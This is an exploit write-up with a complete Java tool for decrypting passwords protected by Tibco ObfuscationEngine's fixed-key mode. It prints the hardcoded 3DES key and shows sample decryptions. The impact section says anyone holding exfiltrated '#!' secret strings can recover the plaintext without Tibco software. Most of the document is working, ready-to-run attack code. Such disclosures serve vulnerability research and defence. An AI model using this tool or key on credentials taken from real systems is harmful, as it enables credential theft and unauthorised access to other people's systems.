# Exploit Title: Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
# Date: December 8th 2020
# Exploit Author: Tess Sluijter
# Vendor Homepage: https://www.tibco.com
# Version: 5.11x and before
# Tested on: MacOS, Linux, Windows
# Tibco password decryption exploit
## Background
Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling:
1. Using a custom key.
2. Using a machine key.
3. Using a fixed key.
https://docs.tibco.com/pub/runtime_agent/5.11.1/doc/pdf/TIB_TRA_5.11.1_installation.pdf?id=2
This write-up pertains to #3 above.
Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!. For example: "#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA".
## Issues
On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key. For example:
* https://support.tibco.com/s/article/Tibco-KnowledgeArticle-Article-30338
* https://community.tibco.com/questions/password-encryptiondecryption
* https://community.tibco.com/questions/deobfuscatedecrypt-namevaluepairpassword-gv-file
* https://community.tibco.com/questions/bw6-password-decrypt
* http://tibcoworldin.blogspot.com/2012/08/decrypting-password-data-type-global.html
* http://tibcoshell.blogspot.com/2016/07/how-to-decrypt-encryptedmasked-password.html
## Impact
Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does **not** require access to Tibco software or libraries. All you need are exfiltrated secret strings that start with the characters #!. This is not going to be fixed by Tibco, this is a design decision also used for backwards compatibility in their software.
## Instructions
Compile with:
javac decrypt.java
Examples of running, with secrets retrieved from websites and forums:
java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
7474
java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
tibco
/* comments!
Compile with:
javac decrypt.java
Run as:
java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
7474
java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP
tibco
*/
import java.io.ByteArrayInputStream;
import java.util.Arrays;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.spec.SecretKeySpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.CipherInputStream;
import javax.crypto.CipherOutputStream;
class Decrypt
{
public static void main (String [] arguments)
{
try
{
byte[] keyBytes = { 28, -89, -101, -111, 91, -113, 26, -70, 98, -80, -23, -53, -118, 93, -83, -17, 28, -89, -101, -111, 91, -113, 26, -70 };
String algo = "DESede/CBC/PKCS5Padding";
String encryptedText = arguments[0];
byte[] message = Base64.getDecoder().decode(encryptedText);
ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(message);
Cipher decipher = Cipher.getInstance(algo);
int i = decipher.getBlockSize();
byte[] ivSetup = new byte[i];
byteArrayInputStream.read(ivSetup);
SecretKey key = new SecretKeySpec(keyBytes, 0, keyBytes.length, "DESede");
decipher.init(2, key, new IvParameterSpec(ivSetup));
// Magic, I admit I don't understand why this is needed.
CipherInputStream cipherInputStream = new CipherInputStream(byteArrayInputStream, decipher);
char[] plaintext;
char[] arrayOfChar1 = new char[(message.length - i) / 2];
byte[] arrayOfByte4 = new byte[2];
byte b = 0;
while (2 == cipherInputStream.read(arrayOfByte4, 0, 2)) {
arrayOfChar1[b++] = (char)((char)arrayOfByte4[1] << '\b' | (char)arrayOfByte4[0]);
}
cipherInputStream.close();
if (b == arrayOfChar1.length) {
plaintext = arrayOfChar1;
} else {
char[] arrayOfChar = new char[b];
System.arraycopy(arrayOfChar1, 0, arrayOfChar, 0, b);
for (b = 0; b < arrayOfChar1.length; b++) {
arrayOfChar1[b] = Character.MIN_VALUE;
}
plaintext = arrayOfChar;
// End of Magic
}
System.out.println(plaintext);
}
catch (Exception ex)
{
System.out.println("Barf...");
System.out.println(ex);
}
}
}
